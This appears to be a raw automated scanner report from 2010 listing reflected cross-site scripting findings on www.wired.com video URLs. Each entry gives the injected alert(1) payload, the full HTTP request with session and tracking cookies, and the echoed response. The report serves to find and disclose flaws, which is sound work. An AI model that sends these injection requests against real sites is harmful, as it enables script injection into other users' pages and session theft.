<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoc71e2--><script>alert(1)</script>6815d60c49/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a36"><a>69c504b8c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoa9a36"><a>69c504b8c86/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29440 Vary: Accept-Encoding Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:40:45 GMT Date: Mon, 22 Nov 2010 00:35:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoa9a36"><a>69c504b8c86 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27ea9"><a>5355e0c47b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos27ea9"><a>5355e0c47b2/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:41:35 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos27ea9"><a>5355e0c47b2 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b973"-alert(1)-"1cd8a1ddd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos7b973"-alert(1)-"1cd8a1ddd78/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:43 GMT Date: Mon, 22 Nov 2010 00:37:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... pt type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1aa"><a>b764377f1e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest8e1aa"><a>b764377f1e7/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:42:49 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest8e1aa"><a>b764377f1e7"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f815d"-alert(1)-"3d3ca4afe87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestf815d"-alert(1)-"3d3ca4afe87/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:52 GMT Date: Mon, 22 Nov 2010 00:38:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c31ad"-alert(1)-"cf3b712c3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633c31ad"-alert(1)-"cf3b712c3a/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:44:12 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... pt type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f428a"-alert(1)-"7fe3d28d3e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earthf428a"-alert(1)-"7fe3d28d3e9/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 00:44:15 GMT Date: Mon, 22 Nov 2010 00:39:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6174"-alert(1)-"0c39f2dcc8b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001f6174"-alert(1)-"0c39f2dcc8b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:50 GMT Date: Mon, 22 Nov 2010 00:39:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... pt type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 85728--><script>alert(1)</script>6bb8ad67c22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video85728--><script>alert(1)</script>6bb8ad67c22/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29483 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:32 GMT Date: Mon, 22 Nov 2010 00:35:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video85728--><script>alert(1)</script>6bb8ad67c22/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb4f"><a>5e07a67febf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8eb4f"><a>5e07a67febf/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29444 Vary: Accept-Encoding Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:38:55 GMT Date: Mon, 22 Nov 2010 00:34:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8eb4f"><a>5e07a67febf ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b9a0"-alert(1)-"baca53fa180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos3b9a0"-alert(1)-"baca53fa180/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:41:26 GMT Date: Mon, 22 Nov 2010 00:36:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2782"><a>13c785d8e84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videose2782"><a>13c785d8e84/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:40:18 GMT Date: Mon, 22 Nov 2010 00:35:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videose2782"><a>13c785d8e84 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b24ca"-alert(1)-"f6fa933e780 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestb24ca"-alert(1)-"f6fa933e780/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:26 GMT Date: Mon, 22 Nov 2010 00:37:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79878"><a>7a4f304f4cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest79878"><a>7a4f304f4cf/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest79878"><a>7a4f304f4cf"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92bef"-alert(1)-"83beb12e69a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663392bef"-alert(1)-"83beb12e69a/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:33 GMT Date: Mon, 22 Nov 2010 00:37:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eefd"-alert(1)-"6be03000938 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team7eefd"-alert(1)-"6be03000938/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:50 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7386"-alert(1)-"a9f8081c1bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001c7386"-alert(1)-"a9f8081c1bd HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
